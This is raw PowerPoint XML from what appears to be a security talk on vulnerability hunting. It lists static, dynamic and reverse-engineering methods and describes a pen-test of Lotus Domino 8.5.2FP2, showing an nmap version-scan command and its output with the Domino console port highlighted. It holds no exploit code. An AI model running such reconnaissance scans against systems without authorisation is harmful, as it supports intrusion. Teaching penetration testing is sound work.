            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3349422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8640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374848" y="1412776"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>formal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ormal methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ands…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fuzzing (bin/web)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	+  Typical bugs for class </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	+  Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hand testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Architecture Analysis (Logic flaws)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Database (CVE/exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Группа 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1166936" y="2060848"/>
            <a:ext cx="2232248" cy="864096"/>
            <a:chOff x="5436096" y="3005336"/>
            <a:chExt cx="1440160" cy="207640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Прямая соединительная линия 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5436096" y="3005336"/>
              <a:ext cx="1440160" cy="2076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H="1" flipV="1">
              <a:off x="5476292" y="3005336"/>
              <a:ext cx="1359768" cy="18002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80123" y="2143037"/>
            <a:ext cx="2129109" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>BlackBox</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Группа 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1104632" y="2852936"/>
            <a:ext cx="2232248" cy="864096"/>
            <a:chOff x="5436096" y="3005336"/>
            <a:chExt cx="1440160" cy="207640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Прямая соединительная линия 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5436096" y="3005336"/>
              <a:ext cx="1440160" cy="2076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flipH="1" flipV="1">
              <a:off x="5476292" y="3005336"/>
              <a:ext cx="1359768" cy="18002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3780123" y="2985421"/>
            <a:ext cx="3150221" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Not much time</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Скругленный прямоугольник 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789410" y="3979558"/>
            <a:ext cx="3401861" cy="745585"/>
          </a:xfrm>
          <a:prstGeom prst="round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0" name="Группа 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1598983" y="4509120"/>
            <a:ext cx="1954779" cy="312148"/>
            <a:chOff x="5436096" y="3005336"/>
            <a:chExt cx="1440160" cy="207640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Прямая соединительная линия 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5436096" y="3005336"/>
              <a:ext cx="1440160" cy="20764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H="1" flipV="1">
              <a:off x="5476292" y="3005336"/>
              <a:ext cx="1359768" cy="18002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3" name="Скругленный прямоугольник 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590871" y="4809210"/>
            <a:ext cx="5318361" cy="1140070"/>
          </a:xfrm>
          <a:prstGeom prst="round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696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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="2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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="20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9"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2920" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bug hunting?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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7</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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7636" y="2060848"/>
            <a:ext cx="8059844" cy="3600400"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3333644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0992" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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8</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\Alexej\Downloads\images (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748537"/>
            <a:ext cx="4392488" cy="437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752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8864" y="332656"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s see some real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stuff</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1556792"/>
            <a:ext cx="8229600" cy="4824536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="sng" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="sng" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>pen-test  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Lotus Domino 8.5.2FP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Second pen-test		-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lotus Domino 8.5.3  (the latest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>How to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>-PN -T5 -p … 0 192.168.0.13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>. . .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>scan report for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>targethost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> (192.168.0.13)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>PORT     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0"/>
              <a:t>STATE SERVICE           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>VERSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>110/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>   open  pop3          Lotus Domino POP3 server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>8.5.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>1352/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lotusnotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>        Lotus Domino server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(CN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>SERV;Org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>=Company)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>1533/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>  open  http          Lotus Domino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>2050/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>dominoconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>Lotus Domino Console (domain: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>; d</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1"/>
              <a:t>escription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>“COMPANY")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>49152/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>  open  http          Microsoft HTTP API 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>Address: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>00:1A:1B:8A:1F:1E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>(Hewlett Packard)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>Service Info: OS: Windows/Longhorn/64 6.1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Скругленный прямоугольник 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2708920"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
